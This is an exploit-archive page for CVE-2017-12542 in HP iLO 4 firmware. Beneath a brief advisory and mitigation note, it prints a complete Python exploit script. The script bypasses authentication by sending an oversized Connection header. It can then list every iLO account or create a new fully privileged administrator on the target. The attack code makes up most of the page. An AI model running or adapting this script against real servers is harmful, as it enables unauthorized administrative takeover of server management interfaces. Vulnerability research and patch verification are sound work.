header-logo
Suggest Exploit
vendor:
Integrated Lights-Out 4
by:
synacktiv
10.0
CVSS
CRITICAL
Remote Code Execution
20
CWE
Product Name: Integrated Lights-Out 4
Affected Version From: 2.53
Affected Version To: 2.53
Patch Exists: YES
Related CWE: CVE-2017-12542
CPE: a:hewlett_packard:integrated_lights-out_4
Metasploit: https://www.rapid7.com/db/vulnerabilities/hp-ilo-cve-2017-12542/
Other Scripts: N/A
Platforms Tested: None
2018

Remote Code Execution Vulnerability in HP iLO

A vulnerability in HP iLO 4 firmware version 2.53 and prior allows an attacker to execute arbitrary code on the target system. The vulnerability is due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the targeted system. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.

Mitigation:

HP has released a security bulletin and software updates to address this vulnerability. Users are advised to apply the necessary updates.
Source

Exploit-DB raw data:

#!/usr/bin/env python

"""
Exploit trigger was presented @reconbrx 2018

Vulnerability found and documented by synacktiv:
https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html

Original advisory from HP:
https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us

Other advisories for this CVE:
https://tools.cisco.com/security/center/viewAlert.x?alertId=54930
https://securitytracker.com/id/1039222

IMPORTANT: 
THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542!!!
The two other vulns are critical as well, but only triggerable on the host itself.


"""

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import json
import urllib3

#all of the HP iLO interfaces run on HTTPS, but most of them are using self-signed SSL cert 
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

exploit_trigger = {'Connection' : 'A'*29}
accounts_url = 'https://%s/rest/v1/AccountService/Accounts'



def test(ip):
	
	url = accounts_url % ip
	try:
		response = requests.get(url, headers = exploit_trigger, verify = False)
	except Exception as e:
		return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))

	try:
		data = json.loads(response.text)
	except Exception as e:
		return False, 'Target response not as exected!, Exception data: %s' % (str(e),)

	return True, data

def exploit(ip, username, password):
	Oem = {
		'Hp' : {
			'LoginName' : username,
			'Privileges': {
				'LoginPriv' : True,
				'RemoteConsolePriv': True,
				'UserConfigPriv' : True,
				'VirtualMediaPriv': True,
				'iLOConfigPriv':True,
				'VirtualPowerAndResetPriv':True,
			}
		}
	}
	body = {
		'UserName':username,
		'Password':password,
		'Oem':Oem
	}
	url = accounts_url % ip



	try:
		response = requests.post(url, json=body, headers = exploit_trigger, verify = False)
	except Exception as e:
		return False, 'Could not connect to target %s, Reason: %s' % (ip, str(e))

	if response.status_code in [requests.codes.ok, requests.codes.created]:
		return True, response.text
	else:
		return False, 'Server returned status code %d, data: %s' % (response.status_code, response.text)

if __name__ == '__main__':
	import argparse
	import sys
	parser = argparse.ArgumentParser(description='CVE-2017-12542 Tester and Exploiter script.')
	parser.add_argument('ip', help='target IP')
	parser.add_argument('-t', action='store_true', default=True, help='Test. Trigger the exploit and list all users')
	parser.add_argument('-e', action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in -u and -p')
	parser.add_argument('-u', help='username of the new admin user')
	parser.add_argument('-p', help='password of the new admin user')

	args = parser.parse_args()

	if args.e:
		if args.u is None or args.p is None:
			print('Username and password must be set for exploiting!')
			sys.exit()
		res, data = exploit(args.ip, args.u, args.p)
		if res:
			print('[+] Sucsessfully added user!')
		else:
			print('[-] Error! %s' % data)

	elif args.t:
		res, data = test(args.ip)
		if res:
			print('[+] Target is VULNERABLE!')
			for i in data['Items']:
				print('[+] Account name: %s Username: %s' % (i['Name'], i['Oem']['Hp']['LoginName']))
		else:
			print('[-] Error! %s' % data)

Navigation

Suggest Exploit

Services By CQR